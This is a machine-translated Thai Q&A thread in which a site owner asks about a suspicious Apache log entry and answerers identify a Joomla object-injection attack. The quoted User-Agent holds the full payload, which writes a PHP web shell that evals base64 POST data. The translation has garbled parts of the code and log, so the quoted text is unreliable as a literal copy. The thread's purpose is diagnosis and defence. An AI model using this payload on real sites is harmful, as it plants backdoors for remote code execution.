ใช้การระบุตัวตนตัวแทนผู้ใช้สำหรับเทคนิคการโจมตีสคริปต์หรือไม่?


10

รายการบันทึกการเข้าถึง Apache บนไซต์ของฉันมักจะเป็นรายการนี้:

207.46.13.174 - - [31 / Oct / 2016: 10: 18: 55 +0100] "รับ / ติดต่อ HTTP / 1.1" 200 256 "-" "Mozilla / 5.0 (เข้ากันได้; bingbot / 2.0; + http: // www .bing.com / bingbot.htm) "0.607 นางสาว 10.10.36.125:104 0.607

เพื่อให้คุณสามารถเห็นฟิลด์ตัวแทนผู้ใช้ที่นั่น แต่วันนี้ฉันยังพบฟิลด์ตัวแทนผู้ใช้ที่ใช้สิ่งนี้:

62.210.162.42 - - [31 / Oct / 2016: 11: 24: 19 +0100] "GET / HTTP / 1.1" 200 399 "-" "} __ ทดสอบ | O: 21:" JDatabaseDriverMysqli ": 3: {s: 2 "เอฟซี"; O: 17: "JSimplepieFactory": 0: {} s: 21: "\ 0 \ 0 \ 0disconnectHandlers"; a: 1: {i: 0; a: 2: {i: 0; O: 9: "SimplePie": 5: {s: 8: "sanitize"; O: 20: "JDatabaseDriverMysql": 0: {} s: 8: "FEED_URL"; s: 242: "file_put_contents ($ _ SERVER [" DOCUMENT_ROOT" ] .chr (47). "sqlconfigbak.php", "| = | \ x3C" .chr (63). "php \ x24mujj = \ x24_POST ['z']; ถ้า (\ x24mujj! = '') {\ ' x24xsser = base64_decode (\ x24_POST [ 'z0']); @ EVAL (\ "\\\ x24safedg = \ x24xsser; \");} "); JFactory :: getConfig (); ทางออก;"; s: 19:" cache_name_function "; s: 6:" ยืนยัน "; s: 5:" แคช "; b: 1; s: 11:" cache_class "; O: 20:"JDatabaseDriverMysql ": 0: {}} i: 1; s: 4:" init ";}} s: 13:" \ 0 \ 0 \ 0 เชื่อมต่อโครงข่าย "; b: 1;} ~ Ů" 0.304 BYPASS 10.10.36.125:104 0.304

นี่เป็นการโจมตีหรือไม่? รายการบันทึกถัดไปดูเหมือนจะมีการดึงไฟล์ (รหัส 200) ที่sqlconfigbak.phpกล่าวถึงในสคริปต์สำเร็จ แม้ว่าฉันจะไม่พบไฟล์ในระบบไฟล์:

62.210.162.42 - - [31 / ต.ค. / 2559: 11: 24: 20 +0100] "GET //sqlconfigbak.php HTTP / 1.1" 200 399 "http://www.googlebot.com/bot.html" "Mozilla /5.0 (ใช้งานได้; Googlebot / 2.1; + http: //www.google.com/bot.html) "0.244 BYPASS 10.10.36.125:104 0.244

ได้โปรดเกิดอะไรขึ้นที่นี่

คำตอบ:


11

นี่คือการโจมตี Joomla 0 วัน ข้อมูลพบได้ที่นี่: https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html

นี่ไม่ใช่การทดสอบช่องโหว่แม้จะทดสอบ __ ก็ตาม มันคือการโจมตี

ตรวจสอบให้แน่ใจว่าการติดตั้ง Joomla ใด ๆ เป็นปัจจุบันที่สุด

อีกทางเลือกหนึ่งคือใช้. htaccess เพื่อสกัดกั้นช่องโหว่นี้โดยการค้นหาสตริงทั่วไป "__test" จะใช้งานได้และเปลี่ยนเส้นทางไปยังที่อื่น


4

ที่อยู่ IP ที่คุณเชื่อมโยงไม่ได้แก้ไขชื่อโฮสต์ของ Google ดังนั้นจึงไม่ใช่ Google บุคคลหรือบอทกำลังสแกนหาช่องโหว่ของเว็บไซต์ของคุณ คนแรกพยายามที่จะหาช่องโหว่ของ Joomla

เหตุการณ์เหล่านี้เป็นเหตุการณ์ที่เกิดขึ้นเป็นประจำในเว็บไซต์ส่วนใหญ่คุณควรตรวจสอบให้แน่ใจว่าคุณได้ปฏิบัติตามแนวทางปฏิบัติที่ดีที่สุดและทำให้เว็บไซต์ของคุณแข็งแกร่งขึ้นกระบวนการนี้ใช้เวลานานและคุณจะต้องค้นหาและปฏิบัติตามบทช่วยสอนออนไลน์


โอเคขอบคุณ. ฉันแข็งเว็บไซต์แล้วยังหามันก่อน จริงๆแล้วการหาเวกเตอร์โจมตีเช่นนั้นทำให้ฉันประหลาดใจนิดหน่อย
miroxlav

2

นอกจากนี้สำหรับคำตอบอื่น ๆ โปรดทราบว่าการโจมตีนี้เห็นได้ชัดว่าเป็นการแนะนำให้คุณใช้ PHP เวอร์ชันเก่าและไม่ปลอดภัย การแก้ไขข้อผิดพลาดที่การโจมตีด้วยวิธีนี้ได้รับการปล่อยตัวในเดือนกันยายน 2015 รันกระบวนการอัปเดตของคุณและตรวจสอบให้แน่ใจว่ามันดึง PHP เวอร์ชันล่าสุด และตรวจสอบโปรแกรมที่ล้าสมัยอื่น ๆ ที่เข้ากับอินเทอร์เน็ตด้วยเช่นกันดูเหมือนว่าเซิร์ฟเวอร์ของคุณจะไม่ได้รับการอัพเดทอย่างน้อยปีละครั้ง


จุดที่ดีสาปแช่ง!
Closnoc
โดยการใช้ไซต์ของเรา หมายความว่าคุณได้อ่านและทำความเข้าใจนโยบายคุกกี้และนโยบายความเป็นส่วนตัวของเราแล้ว
Licensed under cc by-sa 3.0 with attribution required.